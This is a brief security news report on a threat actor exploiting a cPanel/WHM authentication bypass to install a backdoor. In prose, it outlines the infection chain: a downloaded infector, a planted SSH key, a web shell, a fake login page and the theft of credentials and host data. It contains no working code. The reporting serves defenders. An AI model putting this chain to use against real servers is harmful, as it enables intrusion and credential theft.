A threat actor tracked as Mr_Rot13 has been linked to attacks exploiting a critical cPanel vulnerability to install a backdoor called Filemanager on compromised systems, with more than 2,000 attacker source IPs seen in activity targeting the flaw, according to a technical analysis by QiAnXin XLab.
KEY FACTS
- Vulnerability CVE-2026-41940 affects cPanel and WHM and can allow an authentication bypass.
- Observed activity XLab said attacks have involved cryptocurrency mining, ransomware, botnet propagation, and backdoor deployment.
- Backdoor Filemanager supports file management, remote command execution, and shell access.
- Scale More than 2,000 attacker source IPs were seen worldwide.
The report said the exploitation began shortly after the flaw was publicly disclosed late last month. It described a shell script that uses wget or curl to fetch a Go-based infector, which then plants an SSH public key for persistent access and drops a PHP web shell.
The web shell is used to inject JavaScript that serves a fake login page and sends stolen credentials to an attacker-controlled domain encoded with ROT13. The same chain also deploys a cross-platform backdoor that can affect Windows, macOS, and Linux systems.
The infector is also set up to collect bash history, SSH data, device information, database passwords, and cPanel virtual aliases from compromised hosts. XLab said the infrastructure suggests the group has operated for years, citing a domain first registered in 2020 and a backdoor uploaded in 2022.
WHY IT MATTERS
The activity shows how quickly newly disclosed control panel flaws can be turned into access for malware, credential theft, and broader intrusion. For affected administrators, the report points to the need for rapid patching and checks for unauthorized keys, shells, and login tampering.